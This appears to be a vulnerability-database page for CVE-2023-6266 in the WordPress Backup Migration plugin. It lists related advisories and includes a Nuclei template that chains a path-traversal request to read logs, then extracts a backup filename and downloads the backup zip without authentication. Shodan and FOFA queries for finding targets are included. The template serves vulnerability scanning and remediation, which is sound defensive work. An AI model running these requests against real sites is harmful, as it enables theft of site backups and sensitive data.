| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2023-6266 | 11 Jan 202410:26 | – | circl | |
| WordPress Plugin Backup Migration Security Vulnerability | 11 Jan 202400:00 | – | cnnvd | |
| CVE-2023-6266 | 11 Jan 202408:32 | – | cve | |
| CVE-2023-6266 Backup Migration <= 1.3.6 - Unauthenticated Arbitrary Backup Download to Sensitive Information Exposure | 11 Jan 202408:32 | – | cvelist | |
| EUVD-2023-58511 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-6266 | 11 Jan 202409:15 | – | nvd | |
| CVE-2023-6266 | 11 Jan 202409:15 | – | osv | |
| WordPress Backup Migration Plugin <= 1.3.6 is vulnerable to Sensitive Data Exposure | 1 Dec 202300:00 | – | patchstack | |
| Path traversal | 11 Jan 202409:15 | – | prion | |
| PT-2024-14919 | 11 Jan 202400:00 | – | ptsecurity |
id: CVE-2023-6266
info:
name: WordPress Backup Migration <= 1.3.6 - Path Traversal
author: riteshs4hu
severity: high
description: |
WordPress Backup Migration plugin versions up to 1.3.6 contain a path traversal and file validation issue in handle_downloading function, letting unauthenticated attackers download backup files containing sensitive information.
impact: |
Attackers can download backup files with sensitive data, leading to data breaches and privacy violations.
remediation: |
Update to the latest version of the plugin, version 1.3.7 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d8c3c04e-c0f9-4f7e-b7e5-3e3e3e3e3e3e
- https://patchstack.com/database/vulnerability/backup-backup/wordpress-backup-migration-plugin-1-3-7-unauthenticated-arbitrary-backup-download-vulnerability
- https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.5/includes/initializer.php#L1048
- https://plugins.trac.wordpress.org/browser/backup-backup/tags/1.3.5/includes/initializer.php#L972
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6266
cwe-id: CWE-552
epss-score: 0.02072
epss-percentile: 0.79178
cpe: cpe:2.3:a:backupbliss:backup_migration:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: backupbliss
product: backup_migration
framework: wordpress
shodan-query: http.html:"backup-migration"
fofa-query: body="backup-migration"
tags: cve,cve2023,wp,wp-plugin,wordpress,backupbliss,backup-migration,vkev
flow: http(1) && http(2)
http:
- raw:
- |
GET /?backup-migration=BMI_BACKUP&backup-id=../complete_logs.log HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "BM_Backup")'
condition: and
internal: true
extractors:
- type: regex
name: backupfile
part: body
regex:
- 'BM_Backup_[0-9_-]+_[A-Za-z0-9]+\.zip'
internal: true
- raw:
- |
GET /?backup-migration=BMI_BACKUP&backup-id={{backupfile}} HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/zip")'
condition: and
# digest: 4a0a00473045022100c0853d79ad133579232d27326e2c160e5ef10ec2fbdaf6f6b1d1f4036aee3ce902204899bf73cd5e8d07187fd9d46c13f815c351f8e78bab7f9a8207370fa742658d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation